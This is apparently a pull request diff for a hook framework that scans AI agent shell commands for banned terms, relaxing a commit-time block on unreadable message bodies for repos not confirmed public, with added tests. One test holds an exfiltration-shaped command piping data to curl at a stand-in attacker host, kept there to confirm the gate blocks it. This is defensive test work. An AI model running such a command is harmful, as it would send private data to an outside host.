### PR TITLE
fix(hooks): downgrade unreadable-body banned-terms block on a local commit to a not-provably-public repo (#1415)

### DIFF
--- a/hooks/scripts/banned_terms_marker.py
+++ b/hooks/scripts/banned_terms_marker.py
@@ -1,0 +1,73 @@
+"""Destination-aware resolution of a banned-terms fail-closed MARKER (#1415).
+
+Split out of ``hook_router.py`` (a shrink-only module-health-capped god-module)
+so the marker decision's logic and its rationale live in a bare sibling module
+the router imports. The router keeps only the thin ``deny`` emission; this module
+owns "given a fail-closed marker, does the destination let it DOWNGRADE to a warn,
+or does it hard-block?".
+
+``scan_text`` returns either a configured banned term or one of three fail-closed
+markers. A REAL configured term is handled by the router's destination-aware
+banned-term path, not here -- ``resolve_marker`` reports ``is_marker=False`` for
+it. For the two unreadable-body markers the decision is destination-aware (the
+SCANNER-unavailable marker stays hard-blocking on every surface, #1954). It
+downgrades to a warn in two cases. First, a ``git commit`` landing in a PRIVATE
+repo, or a pure private ``gh``/``glab`` post (``command_targets_private_only``):
+not a public surface at all. Second, a ``git commit`` landing in a
+NOT-provably-public repo -- private, allowlisted, OR unknown-visibility
+(``command_targets_non_public_commit``, #1415 task #62): a commit is LOCAL, and
+the pre-push public-leak gate (``refuse-public-push-with-leak.sh``) re-scans commit
+messages before they reach a public remote, so an ordinary commit on an undeclared
+repo whose body the gate cannot READ (a message mentioning a command-substitution
+snippet) must not hard-block. A non-commit ``gh``/``glab`` post is the real public
+action with no push gate behind it, so it is NOT widened -- it keeps hard-blocking.
+A probe-confirmed PUBLIC-repo commit also keeps the block (conservative defence in
+depth).
+"""
+
+from dataclasses import dataclass
+from pathlib import Path
+
+_PRIVATE_DEST_WARNING = (
+    "WARNING: banned-terms gate (#1415) — could not read the commit/post body, but the "
+    "destination is a private repo; downgraded to warn. A private-repo body is not a public leak.\n"
+)
+_LOCAL_COMMIT_WARNING = (
+    "WARNING: banned-terms gate (#1415) — could not read the commit body, but it is a local "
+    "commit to a not-provably-public repo; downgraded to warn. The pre-push gate re-scans "
+    "commit messages before they reach a public remote.\n"
+)
+
+
+@dataclass(frozen=True)
+class MarkerVerdict:
+    """Outcome of resolving a ``scan_text`` result against the destination.
+
+    ``deny_message`` is the hard-block reason (the marker's own deny message) when
+    the marker must DENY; ``warning`` is the stderr line to print when it
+    DOWNGRADES to a warn. Exactly one is non-``None`` for a fail-closed marker;
+    BOTH are ``None`` for a real configured banned term (the router takes its
+    own destination-aware banned-term path) -- distinguished by ``is_marker``.
+    """
+
+    deny_message: str | None
+    warning: str | None
+    is_marker: bool
+
+
+def resolve_marker(term: str, command: str, cwd_repo: Path | None) -> MarkerVerdict:
+    """Resolve a ``scan_text`` result to a deny / downgrade / not-a-marker verdict."""
+    from teatree.hooks import banned_terms_scanner, publish_surface  # noqa: PLC0415
+
+    marker_message = banned_terms_scanner.marker_deny_message(term)
+    if marker_message is None:
+        return MarkerVerdict(deny_message=None, warning=None, is_marker=False)
+    unreadable_body_markers = {
+        banned_terms_scanner.UNRESOLVABLE_BODY_MARKER,
+        banned_terms_scanner.UNAVAILABLE_BODY_SOURCE_MARKER,
+    }
+    if term in unreadable_body_markers and publish_surface.command_targets_private_only(command, cwd_repo):
+        return MarkerVerdict(deny_message=None, warning=_PRIVATE_DEST_WARNING, is_marker=True)
+    if term in unreadable_body_markers and publish_surface.command_targets_non_public_commit(command, cwd_repo):
+        return MarkerVerdict(deny_message=None, warning=_LOCAL_COMMIT_WARNING, is_marker=True)
+    return MarkerVerdict(deny_message=marker_message, warning=None, is_marker=True)

--- a/hooks/scripts/hook_router.py
+++ b/hooks/scripts/hook_router.py
@@ -39,6 +39,7 @@ if TYPE_CHECKING:
 if str(Path(__file__).resolve().parent) not in sys.path:
     sys.path.insert(0, str(Path(__file__).resolve().parent))
 
+from banned_terms_marker import resolve_marker as _resolve_banned_terms_marker
 from django_bootstrap import bootstrap_teatree_django
 from loop_state_self_pump_gate import db_loop_state_suppresses_self_pump
 from mr_cli_fields import extract_cli_mr_fields
@@ -3277,37 +3278,19 @@ def _emit_banned_term_deny(
 def _banned_term_marker_blocks(term: str, command: str, cwd_repo: "Path | None") -> bool | None:
     """Decide a fail-closed MARKER term, or ``None`` when ``term`` is a real banned term.
 
-    ``scan_text`` returns either a configured banned term or a fail-closed
-    marker (an unresolvable body, an unavailable scanner). For a real term this
-    returns ``None`` so the caller takes the destination-aware banned-term path.
-
-    For the two unreadable-body markers the decision is destination-aware: an
-    UNREADABLE body file (a ``git commit -F <path>`` whose file does not exist
-    at cold-hook scan time, a missing ``--body-file``) OR an UNAVAILABLE body
-    source (an unexpanded ``$VAR`` / a stdin body, #2369) hard-blocks on a PUBLIC
-    surface — an unscanned body must never slip into public history — but a
-    ``git commit`` landing in a PRIVATE repo (or a pure private gh/glab post) is
-    not a public surface, so the unread body cannot leak and the gate downgrades
-    to a warn (#1415). The payload-driven carve-out fails closed on the sentinel,
-    so a body-INDEPENDENT private-destination check decides it here. The
-    SCANNER-unavailable marker stays hard-blocking on every surface (#1954).
+    Thin router wrapper over ``banned_terms_marker.resolve_marker`` (which owns the
+    destination-aware logic + rationale). For a real configured term it returns
+    ``None`` so the caller takes its own destination-aware banned-term path. For a
+    fail-closed marker the verdict is either a downgrade-to-warn (write the stderr
+    line, return ``False``) or a hard-block (``emit_pretooluse_deny``).
     """
-    from teatree.hooks import banned_terms_scanner, publish_surface  # noqa: PLC0415
-
-    marker_message = banned_terms_scanner.marker_deny_message(term)
-    if marker_message is None:
+    verdict = _resolve_banned_terms_marker(term, command, cwd_repo)
+    if not verdict.is_marker:
         return None
-    unreadable_body_markers = {
-        banned_terms_scanner.UNRESOLVABLE_BODY_MARKER,
-        banned_terms_scanner.UNAVAILABLE_BODY_SOURCE_MARKER,
-    }
-    if term in unreadable_body_markers and publish_surface.command_targets_private_only(command, cwd_repo):
-        sys.stderr.write(
-            "WARNING: banned-terms gate (#1415) — could not read the commit/post body, but the "
-            "destination is a private repo; downgraded to warn. A private-repo body is not a public leak.\n"
-        )
+    if verdict.warning is not None:
+        sys.stderr.write(verdict.warning)
         return False
-    return emit_pretooluse_deny(marker_message)
+    return emit_pretooluse_deny(verdict.deny_message or "")
 
 
 def _run_banned_terms_pretool(data: dict) -> bool:

--- a/src/teatree/hooks/_commit_carve_out.py
+++ b/src/teatree/hooks/_commit_carve_out.py
@@ -68,15 +68,16 @@ def commit_target_downgrades(command: str, cwd: Path | None, *, config_path: Pat
     return commit_targets_private_repo(repo_root, config_path=config_path)
 
 
-def commit_branch_downgrades(command: str, cwd: Path | None, *, config_path: Path | None) -> bool:
-    r"""Return True iff a ``git commit`` command may downgrade to warn.
+def _chained_segments_provably_inert(command: str, cwd: Path | None, *, config_path: Path | None) -> bool:
+    r"""Return True iff every NON-commit segment of ``command`` cannot publish.
 
-    The body downgrade-eligibility is decided by :func:`commit_target_downgrades`;
-    every CHAINED segment must additionally be PROVABLY publish-inert (no forge
-    tool, no execution-transport or substitution construct) or a pure private
-    ``gh``/``glab`` post. Any other publishing construct fails the proof and the
-    hard-block stands -- the unresolvable-body fail-open never relaxes a chained
-    public post.
+    The chained-segment half of the commit carve-out, shared by both commit
+    downgrade predicates: every segment that is not the ``git commit`` itself
+    must be PROVABLY publish-inert (no forge tool, no execution-transport or
+    substitution construct) OR a pure private ``gh``/``glab`` post. Any other
+    publishing construct fails the proof, so a chained PUBLIC post in the same
+    command keeps the hard-block -- the unresolvable-body fail-open never relaxes
+    a chained public post.
     """
     from teatree.hooks.publish_surface import (  # noqa: PLC0415
         is_git_commit_command,
@@ -84,8 +85,6 @@ def commit_branch_downgrades(command: str, cwd: Path | None, *, config_path: Pat
         strip_cd_prefix,
     )
 
-    if not commit_target_downgrades(command, cwd, config_path=config_path):
-        return False
     for words in _gh_glab_hiding.command_segments(command):
         if is_git_commit_command(" ".join(words)):
             continue
@@ -97,6 +96,87 @@ def commit_branch_downgrades(command: str, cwd: Path | None, *, config_path: Pat
             continue
         return False
     return True
+
+
+def commit_branch_downgrades(command: str, cwd: Path | None, *, config_path: Path | None) -> bool:
+    r"""Return True iff a ``git commit`` command may downgrade to warn.
+
+    The body downgrade-eligibility is decided by :func:`commit_target_downgrades`
+    (a known-PRIVATE or genuinely-unresolvable-LOCAL landing repo); every CHAINED
+    segment must additionally pass :func:`_chained_segments_provably_inert`. This
+    is the predicate for a SCANNABLE banned-term match: an unknown-visibility repo
+    is NOT eligible (the term is visible and the commit may be pushed public).
+    """
+    if not commit_target_downgrades(command, cwd, config_path=config_path):
+        return False
+    return _chained_segments_provably_inert(command, cwd, config_path=config_path)
+
+
+def _repo_root_is_provably_public(repo_root: Path, *, config_path: Path | None) -> bool:
+    """Return True iff ``repo_root`` is a PROBE-CONFIRMED public repo.
+
+    The strict complement of ``publish_surface.commit_targets_private_repo`` for
+    the UNREADABLE-body downgrade: a repo is "provably public" ONLY when the
+    offline ``[teatree] private_repos`` allowlist does NOT cover it AND the live
+    ``gh``/``glab`` probe positively returns ``PUBLIC``. An UNKNOWN visibility (the
+    probe is unavailable in the cold hook's restricted PATH, or the slug is
+    unresolvable) is NOT provably public -- it returns False -- so an undeclared
+    local checkout (the common steady state) is treated as not-provably-public and
+    its unscannable-body commit downgrades rather than hard-blocking. The
+    fail-direction is the OPPOSITE of ``commit_targets_private_repo`` (unknown ->
+    NOT private there, to keep a real SCANNABLE banned term hard-blocked): for an
+    UNREADABLE body a commit is local and the pre-push public-leak gate re-scans
+    commit messages, so blocking ONLY a positively-public commit is correct.
+    """
+    slug = _repo_visibility.slug_for_cwd(repo_root)
+    if not slug:
+        return False
+    if _repo_visibility.slug_is_allowlisted_private(slug, config_path):
+        return False
+    return _repo_visibility.probe_visibility(slug) == "PUBLIC"
+
+
+def commit_target_not_provably_public(command: str, cwd: Path | None, *, config_path: Path | None) -> bool:
+    r"""Return True iff the commit's landing repo is NOT a PROBE-CONFIRMED public repo.
+
+    The UNREADABLE-body sibling of :func:`commit_target_downgrades`. The repo the
+    commit lands in is resolved the same way (``resolve_commit_dir`` -- leading
+    ``cd``/``pushd``, then ``--git-dir`` else ``-C``, never ``--work-tree``,
+    anchored on the ambient ``cwd``), but the landing-repo verdict is WIDER (via
+    :func:`_repo_root_is_provably_public`): a PRIVATE, allowlisted-private, OR
+    UNKNOWN-visibility repo all return True; only a probe-confirmed PUBLIC repo
+    returns False. The wider acceptance is sound ONLY for an unreadable body,
+    where the gate cannot see a leak and the commit is LOCAL -- the pre-push
+    public-leak gate re-scans commit messages before they reach a public remote --
+    so blocking only a positively-public commit is the right conservatism. The
+    ``UNRESOLVABLE_REPO_DIR`` sentinel (a ``-C`` value carrying a substitution
+    marker) hard-blocks (returns False); NO resolvable commit dir at all
+    FAILS-OPEN (True), because a local commit cannot leak.
+    """
+    commit_target = _commit_repo_dir.resolve_commit_dir(command, cwd)
+    if commit_target == _commit_repo_dir.UNRESOLVABLE_REPO_DIR:
+        return False
+    if commit_target is None:
+        return True
+    repo_root = _commit_repo_dir.git_root_for_dir(Path(commit_target))
+    if repo_root is None:
+        return True
+    return not _repo_root_is_provably_public(repo_root, config_path=config_path)
+
+
+def commit_branch_not_provably_public(command: str, cwd: Path | None, *, config_path: Path | None) -> bool:
+    r"""Return True iff an UNREADABLE-body ``git commit`` command may downgrade to warn.
+
+    The unreadable-body sibling of :func:`commit_branch_downgrades`: the landing
+    repo must be NOT-provably-public (:func:`commit_target_not_provably_public`)
+    AND every chained segment must be provably publish-inert or a pure private
+    post (:func:`_chained_segments_provably_inert`). The chained-segment proof is
+    IDENTICAL -- a chained public post still defeats the downgrade -- only the
+    landing-repo eligibility widens from PRIVATE-only to NOT-provably-public.
+    """
+    if not commit_target_not_provably_public(command, cwd, config_path=config_path):
+        return False
+    return _chained_segments_provably_inert(command, cwd, config_path=config_path)
 
 
 def command_has_git_commit_segment(command: str) -> bool:
@@ -150,6 +230,31 @@ def command_targets_private_only(command: str, cwd: Path | None, *, config_path:
     if command_has_git_commit_segment(command):
         return commit_branch_downgrades(command, cwd, config_path=config_path)
     return command_is_pure_private_gh_glab_post(command, cwd, config_path=config_path)
+
+
+def command_targets_non_public_commit(command: str, cwd: Path | None, *, config_path: Path | None = None) -> bool:
+    r"""Return True iff ``command`` is a ``git commit`` landing in a NON-public repo.
+
+    The COMMIT-only, WIDER sibling of :func:`command_targets_private_only`, for
+    the UNREADABLE-body downgrade. ``command_targets_private_only`` requires a
+    PROVABLY-private destination (so an unknown-visibility commit stays
+    hard-blocked); this widens the commit landing-repo acceptance to
+    NOT-provably-public (PRIVATE, allowlisted-private, OR UNKNOWN) via
+    :func:`commit_branch_not_provably_public`, because a ``git commit`` is LOCAL
+    (not a publish to a public surface) and the dedicated pre-push gate re-scans
+    commit messages before they reach a public remote -- so the commit-time gate
+    over-blocks an ordinary commit on an undeclared repo when it merely cannot
+    READ the body (a message that mentions a ``$(...)`` snippet, #1415 task #62).
+
+    SCOPED TO ``git commit`` ONLY: a non-commit ``gh``/``glab`` post is the real
+    public action with no push gate behind it, so it is NOT widened here -- it
+    returns False and the unreadable-body marker keeps hard-blocking it. The
+    chained-segment proof is unchanged, so a commit chained to a PUBLIC post still
+    hard-blocks.
+    """
+    if not command_has_git_commit_segment(command):
+        return False
+    return commit_branch_not_provably_public(command, cwd, config_path=config_path)
 
 
 def segment_is_publish_inert(words: list[str]) -> bool:

--- a/src/teatree/hooks/publish_surface.py
+++ b/src/teatree/hooks/publish_surface.py
@@ -507,6 +507,13 @@ def carve_out_applies(
 # logic and the gh/glab-post predicate is reached by a lazy import there).
 command_targets_private_only = _commit_carve_out.command_targets_private_only
 
+# Re-exported sibling of ``command_targets_private_only`` for the UNREADABLE-body
+# downgrade: True iff the command is a ``git commit`` landing in a NON-public repo
+# (private/allowlisted/unknown). A commit is LOCAL and the pre-push gate re-scans
+# commit messages, so an undeclared-repo commit whose body the gate cannot READ
+# downgrades rather than hard-blocking (#1415 task #62). Scoped to commits only.
+command_targets_non_public_commit = _commit_carve_out.command_targets_non_public_commit
+
 
 def own_slug_term_downgrades(
     command: str,

--- a/tests/teatree_hooks/test_banned_terms_hook.py
+++ b/tests/teatree_hooks/test_banned_terms_hook.py
@@ -721,16 +721,17 @@ def test_live_hook_allows_unreadable_commit_body_file_in_private_worktree(
     assert captured.out == ""  # no deny JSON
 
 
-def test_live_hook_blocks_unreadable_commit_body_file_in_public_repo(
+def test_live_hook_blocks_unreadable_commit_body_file_in_provably_public_repo(
     tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
 ) -> None:
-    # ANTI-VACUITY guard for the private-downgrade above: the SAME unreadable
-    # ``git commit -F <nonexistent file>`` landing in a PUBLIC repo (cwd == that
-    # public repo) must STILL hard-block. The downgrade is private-only; an
-    # unscanned body must never slip into public history.
+    # ANTI-VACUITY guard for the downgrade above: the SAME unreadable
+    # ``git commit -F <nonexistent file>`` landing in a PROBE-CONFIRMED-PUBLIC
+    # repo must STILL hard-block. #1415 task #62 relaxes only the not-provably-
+    # public commit case (see the unknown-visibility test below); a known-public
+    # commit keeps the conservative hard-block.
     home = Path(os.environ["HOME"])
     _write_home_config(home, _SUBSTRING_TERM_CONFIG, monkeypatch, tmp_path)
-    monkeypatch.setattr(_repo_visibility, "_resolve_probe_tool", lambda _tool: None)
+    monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: "PUBLIC")
 
     public_repo = _public_clone(tmp_path)
     data = {
@@ -746,13 +747,16 @@ def test_live_hook_blocks_unreadable_commit_body_file_in_public_repo(
     assert decision["permissionDecision"] == "deny"
 
 
-def test_live_hook_blocks_unreadable_commit_body_file_in_unknown_visibility_repo(
+def test_live_hook_downgrades_unreadable_commit_body_file_in_unknown_visibility_repo(
     tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
 ) -> None:
-    # ANTI-VACUITY guard #2: an unreadable commit body whose landing repo is
-    # NEITHER allowlisted NOR probe-resolvable (the common cold-hook unknown
-    # state) must STILL hard-block. Default-deny on unknown visibility is
-    # preserved -- the downgrade fires only for a PROVABLY-private destination.
+    # #1415 task #62: an unreadable commit body whose landing repo is NEITHER
+    # allowlisted NOR probe-resolvable (the common cold-hook unknown state) now
+    # DOWNGRADES to warn. A commit is LOCAL; the pre-push public-leak gate
+    # (refuse-public-push-with-leak.sh) re-scans commit messages before they reach
+    # a public remote, so the commit-time gate must not hard-block an ordinary
+    # commit whose repo the in-hook probe cannot classify. Previously this forced
+    # ALLOW_BANNED_TERM=1 on every ordinary commit in an undeclared checkout.
     home = Path(os.environ["HOME"])
     _write_home_config(home, _SUBSTRING_TERM_CONFIG, monkeypatch, tmp_path)
     monkeypatch.setattr(_repo_visibility, "_resolve_probe_tool", lambda _tool: None)
@@ -769,9 +773,8 @@ def test_live_hook_blocks_unreadable_commit_body_file_in_unknown_visibility_repo
     blocked = handle_banned_terms_pretool(data)
     captured = capsys.readouterr()
 
-    assert blocked is True
-    decision = json.loads(captured.out)
-    assert decision["permissionDecision"] == "deny"
+    assert blocked is False  # downgraded to warn, not denied
+    assert captured.out == ""
 
 
 def test_live_hook_allows_workitem_url_inline_commit_in_private_worktree(

--- a/tests/teatree_hooks/test_banned_terms_scanner.py
+++ b/tests/teatree_hooks/test_banned_terms_scanner.py
@@ -1808,18 +1808,21 @@ class TestPrivateRepoCarveOut:
         assert blocked is False  # downgraded to warn, not denied
         assert capsys.readouterr().out == ""  # no deny JSON on stdout
 
-    def test_commit_bodyfile_genuinely_missing_on_public_repo_still_blocks(
+    def test_commit_bodyfile_genuinely_missing_on_provably_public_repo_still_blocks(
         self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
     ) -> None:
         # ANTI-VACUITY guard for the private downgrade above: the SAME genuinely-
-        # missing ``-F`` path landing in a PUBLIC repo must STILL fail closed --
-        # an unscannable body must never slip into public history. This preserves
-        # the #1207 fail-closed sentinel contract on the public surface.
+        # missing ``-F`` path landing in a PROBE-CONFIRMED-PUBLIC repo must STILL
+        # fail closed. This preserves the #1207 fail-closed sentinel contract on a
+        # known-public surface. (#1415 task #62 relaxes ONLY the not-provably-
+        # public commit case -- see ``...unknown_repo...downgrades`` below -- where
+        # the pre-push gate re-scans commit messages; a probe-confirmed PUBLIC
+        # commit keeps the conservative hard-block.)
         repo = tmp_path / "pub"
         repo.mkdir()
         _git(repo, "init", "-b", "main")
         _git(repo, "remote", "add", "origin", "https://github.com/some/public.git")
-        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: "PUBLIC")
         monkeypatch.chdir(tmp_path)
         data = {
             "tool_name": "Bash",
@@ -1829,6 +1832,30 @@ class TestPrivateRepoCarveOut:
         blocked = handle_banned_terms_pretool(data)
         assert blocked is True
         assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_commit_bodyfile_genuinely_missing_on_unknown_repo_downgrades(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # #1415 task #62: the SAME genuinely-missing ``-F`` path landing in an
+        # UNKNOWN-visibility repo (probe unavailable, not allowlisted) now
+        # DOWNGRADES -- a commit is LOCAL, the gate cannot READ the body, and the
+        # pre-push public-leak gate re-scans commit messages before they reach a
+        # public remote. Previously this hard-blocked, forcing ALLOW_BANNED_TERM=1
+        # on an ordinary commit whose repo the in-hook probe could not classify.
+        repo = tmp_path / "unk"
+        repo.mkdir()
+        _git(repo, "init", "-b", "main")
+        _git(repo, "remote", "add", "origin", "https://github.com/some/unknown.git")
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        data = {
+            "tool_name": "Bash",
+            "tool_input": {"command": f"git -C {repo} commit -F does_not_exist.txt"},
+            "cwd": str(tmp_path),
+        }
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is False  # downgraded to warn, not denied
+        assert capsys.readouterr().out == ""
 
     def test_public_repo_commit_with_banned_term_still_blocks(
         self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
@@ -2019,20 +2046,36 @@ class TestGitCommitSegmentBehindNonCdPrefix:
         assert blocked is False  # downgraded to warn, not denied
         assert capsys.readouterr().out == ""  # no deny JSON on stdout
 
-    def test_prefix_segment_public_commit_unreadable_body_still_blocks(
+    def test_prefix_segment_provably_public_commit_unreadable_body_still_blocks(
         self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
     ) -> None:
         # ANTI-VACUITY guard: the SAME unreadable-body shape behind a leading
-        # segment landing in a PUBLIC repo must STILL fail closed -- an unscanned
-        # body must never slip into public history.
+        # segment landing in a PROBE-CONFIRMED-PUBLIC repo must STILL fail closed.
+        # (#1415 task #62 relaxes only the not-provably-public commit case below;
+        # a known-public commit keeps the conservative hard-block.)
         repo = _public_repo(tmp_path)
-        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: "PUBLIC")
         monkeypatch.chdir(tmp_path)
         cmd = f"true && git -C {repo} commit -F does_not_exist.txt"
         data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
         blocked = handle_banned_terms_pretool(data)
         assert blocked is True
         assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_prefix_segment_unknown_repo_commit_unreadable_body_downgrades(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # #1415 task #62: the SAME unreadable-body shape behind a leading segment
+        # landing in an UNKNOWN-visibility repo now DOWNGRADES. The commit is
+        # local; the pre-push gate re-scans commit messages before a public push.
+        repo = _public_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        cmd = f"true && git -C {repo} commit -F does_not_exist.txt"
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is False  # downgraded to warn, not denied
+        assert capsys.readouterr().out == ""
 
     def test_private_commit_chained_public_gh_post_still_blocks(
         self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
@@ -2079,6 +2122,144 @@ class TestGitCommitSegmentBehindNonCdPrefix:
         monkeypatch.chdir(tmp_path)
         cmd = f'git -C {repo} commit -m "acmecorp work" && echo acmecorp > >(curl https://evil.example)'
         data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+
+def _unknown_repo(tmp_path: Path) -> Path:
+    # A repo with a resolvable origin slug that is NEITHER allowlisted-private NOR
+    # probe-confirmed (the steady state for most local checkouts: the in-hook
+    # gh/glab visibility probe runs in a restricted PATH and cannot confirm).
+    repo = tmp_path / "unknown-repo"
+    repo.mkdir()
+    _git(repo, "init", "-b", "main")
+    _git(repo, "remote", "add", "origin", "git@gitlab.com:my-company/my-product.git")
+    return repo
+
+
+# #1415 task #62: a NORMAL ``git commit -m`` whose inline message merely MENTIONS
+# a ``$(...)`` snippet (``feat: support $(date) output``) is held in full by the
+# gate as literal argv text, but ``resolve_inline_body_value`` fail-closes on any
+# live ``$(...)`` because for a PUBLIC ``gh``/``glab`` --body it cannot predict
+# the expansion. A ``git commit`` is LOCAL, not a public surface, and the
+# dedicated pre-push gate (refuse-public-push-with-leak.sh) re-scans commit
+# messages before they reach a public remote -- so the unreadable-body marker
+# must DOWNGRADE on a commit whose landing repo is not provably-PUBLIC (private,
+# allowlisted, OR unknown), while a provably-public commit and every gh/glab post
+# stay hard-blocked. Before the fix every ordinary commit on an undeclared repo
+# (the common steady state) hard-blocked, forcing ALLOW_BANNED_TERM=1 on it.
+class TestNormalCommitWithDollarParenMessage:
+    def test_unknown_repo_commit_mentioning_dollar_paren_downgrades(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # THE reported bug: a clean commit message that describes a ``$(date)``
+        # snippet on a repo whose visibility is UNKNOWN (not allowlisted, probe
+        # unavailable) must no longer hard-block -- the commit lands in local
+        # history and the push gate is the real public-leak chokepoint.
+        repo = _unknown_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        data = {
+            "tool_name": "Bash",
+            "tool_input": {"command": 'git commit -m "feat: support $(date) output"'},
+            "cwd": str(repo),
+        }
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is False  # downgraded to warn, not denied
+        assert capsys.readouterr().out == ""  # no deny JSON on stdout
+
+    def test_unknown_repo_commit_mentioning_cat_subst_downgrades(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # Same shape with a ``$(cat)`` mention -- the other common false-positive.
+        repo = _unknown_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        data = {
+            "tool_name": "Bash",
+            "tool_input": {"command": 'git commit -m "refactor: use the $(cat) helper"'},
+            "cwd": str(repo),
+        }
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is False
+        assert capsys.readouterr().out == ""
+
+    def test_private_repo_commit_mentioning_dollar_paren_downgrades(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # The task-named case: an allowlisted-private repo commit with a ``$(...)``
+        # mention downgrades (parity with the existing private-repo carve-out).
+        repo = _private_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        data = {
+            "tool_name": "Bash",
+            "tool_input": {"command": 'git commit -m "chore: stamp build with $(date)"'},
+            "cwd": str(repo),
+        }
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is False
+        assert capsys.readouterr().out == ""
+
+    def test_public_repo_commit_mentioning_dollar_paren_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # ANTI-VACUITY guard: a commit landing in a PROVABLY-public repo keeps the
+        # hard-block on an unreadable body -- the downgrade only relaxes the
+        # not-provably-public (private/unknown) case. The push gate is the
+        # backstop, but a known-public commit is still treated conservatively.
+        repo = _public_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: "PUBLIC")
+        data = {
+            "tool_name": "Bash",
+            "tool_input": {"command": 'git commit -m "feat: support $(date) output"'},
+            "cwd": str(repo),
+        }
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_unknown_repo_gh_post_with_live_subst_body_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # ANTI-VACUITY guard: the downgrade is COMMIT-scoped. A gh/glab PUBLIC post
+        # whose --body carries a live ``$(...)`` the gate cannot read is the real
+        # public action (no push gate behind it) and must STILL hard-block.
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        blocked = handle_banned_terms_pretool(
+            _bash('gh pr create --repo someone/public --title t --body "see $(cat notes.md)"')
+        )
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_unknown_repo_commit_chained_public_gh_post_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # LOAD-BEARING safety guard: relaxing the unknown-repo commit must not
+        # relax a chained PUBLIC post in the SAME command. The per-segment proof
+        # keeps the hard-block when a non-inert public post rides along.
+        repo = _unknown_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        monkeypatch.chdir(tmp_path)
+        post = 'gh issue create --repo souliane/teatree --title t --body "see $(cat x.md)"'
+        cmd = f'git -C {repo} commit -m "feat: support $(date) output" && {post}'
+        data = {"tool_name": "Bash", "tool_input": {"command": cmd}, "cwd": str(tmp_path)}
+        blocked = handle_banned_terms_pretool(data)
+        assert blocked is True
+        assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"
+
+    def test_unknown_repo_commit_with_real_banned_term_still_blocks(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]
+    ) -> None:
+        # ANTI-VACUITY guard: the downgrade is for UNREADABLE bodies only. A
+        # SCANNABLE real banned term in an unknown-visibility commit still
+        # hard-blocks -- the gate can see the leak and the commit may be pushed
+        # public, so the real-term path is untouched by this fix.
+        repo = _unknown_repo(tmp_path)
+        monkeypatch.setattr(_repo_visibility, "probe_visibility", lambda _slug: None)
+        data = {
+            "tool_name": "Bash",
+            "tool_input": {"command": 'git commit -m "ship the acmecorp build"'},
+            "cwd": str(repo),
+        }
         blocked = handle_banned_terms_pretool(data)
         assert blocked is True
         assert json.loads(capsys.readouterr().out)["permissionDecision"] == "deny"


### PR DESCRIPTION
## What

